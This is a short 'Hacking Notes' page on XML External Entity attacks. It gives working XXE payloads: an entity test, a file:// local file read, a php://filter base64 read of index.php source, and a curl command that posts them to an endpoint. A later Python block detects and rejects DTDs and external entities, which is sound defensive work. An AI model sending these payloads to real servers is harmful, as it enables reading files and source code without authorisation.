Hacking Notes
Powered by GitBook

XXE

XML External Entity

XXE can be used to read local files on the host, to reach internal hosts (a form of SSRF/RFI), and to achieve RCE in very specific circumstances. By declaring custom entities in the document's DTD, we define values that the parser substitutes wherever the entity is referenced.

Determine if XXE is triggered:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe "haha, this is xxe!">]>
<letter>
        <from>0x90skids</from>
        <return_addr>return_addr</return_addr>
        <name>&xxe;</name>
        <addr>addr</addr>
        <message>message</message>
</letter>

This is for LFI:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///tmp/messages_outbound.txt">]>
<letter>
        <from>0x90skids</from>
        <return_addr>return_addr</return_addr>
        <name>&xxe;</name>
        <addr>addr</addr>
        <message>message</message>
</letter>

Sometimes PHP or Apache will prevent a .php file from being loaded directly. If this is the case, PHP's php://filter stream wrapper can Base64-encode the file before it is included, which bypasses some of these controls; decode the returned value to read the source.

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>

The XML file can be submitted to the endpoint with curl, using the @ prefix so the POST body is read from a file. The --proxy flag routes the request through an interception proxy so the response can be inspected there.

curl --proxy 127.0.0.1:8082 -k -d@./test.xml http://m4lwhere.org/post.php
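As an added defensive counterpart (not part of the original notes): a gate for an XML-accepting endpoint, such as the post.php above, that refuses any document carrying a DTD and reports which external URI an entity pointed at, so the rejection can be logged. The sample documents are constructed from the payloads on this page; the function names are my own.

```python
import re
import xml.etree.ElementTree as ET

# Constructed inputs modelled on the payloads above: a benign letter, the
# "is XXE triggered?" canary, the file:// read, and the php://filter variant.
BENIGN = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<letter><from>0x90skids</from><name>alice</name></letter>"""
CANARY = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe "haha, this is xxe!">]>
<letter><from>0x90skids</from><name>&xxe;</name></letter>"""
LFI = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///tmp/messages_outbound.txt">]>
<letter><from>0x90skids</from><name>&xxe;</name></letter>"""
PHP_FILTER = b"""<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<letter><name>&xxe;</name></letter>"""

# One <!ENTITY ...> declaration: optional '%' (parameter entity), the name,
# an optional SYSTEM/PUBLIC keyword, then the first quoted string (the URI
# for SYSTEM entities, the replacement text for internal ones).
_ENTITY_RE = re.compile(
    rb'<!ENTITY\s+(%\s*)?(?P<name>\w+)\s+(?P<ext>SYSTEM|PUBLIC)?\s*'
    rb'(?P<q>["\'])(?P<val>.*?)(?P=q)', re.IGNORECASE)


def classify_entities(doc: bytes) -> list[tuple[str, str, str]]:
    """Return (name, kind, value) for each entity declared in the DTD;
    kind is 'external' when a SYSTEM/PUBLIC identifier is present."""
    found = []
    for m in _ENTITY_RE.finditer(doc):
        kind = "external" if m.group("ext") else "internal"
        found.append((m.group("name").decode(), kind,
                      m.group("val").decode(errors="replace")))
    return found


def check_submission(doc: bytes) -> tuple[bool, str]:
    """Gate for an endpoint that accepts XML uploads.
    Any DOCTYPE is refused: with no DTD there is nothing for &xxe; to expand
    into. The reason string names external URIs so a log line shows what
    the payload tried to reach."""
    if not re.search(rb"<!DOCTYPE", doc, re.IGNORECASE):
        ET.fromstring(doc)  # well-formedness only; raises ParseError if broken
        return True, "no DTD"
    ents = classify_entities(doc)
    ext = [val for _, kind, val in ents if kind == "external"]
    if ext:
        return False, "external entity: " + ", ".join(ext)
    return False, "DTD with internal entities only: " + ", ".join(n for n, _, _ in ents)
```

The byte-level match assumes an ASCII-compatible encoding, so normalise request bodies to UTF-8 before calling it; treat this as a second line of defence behind a parser configured not to load entities at all.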

Last updated 3 years ago

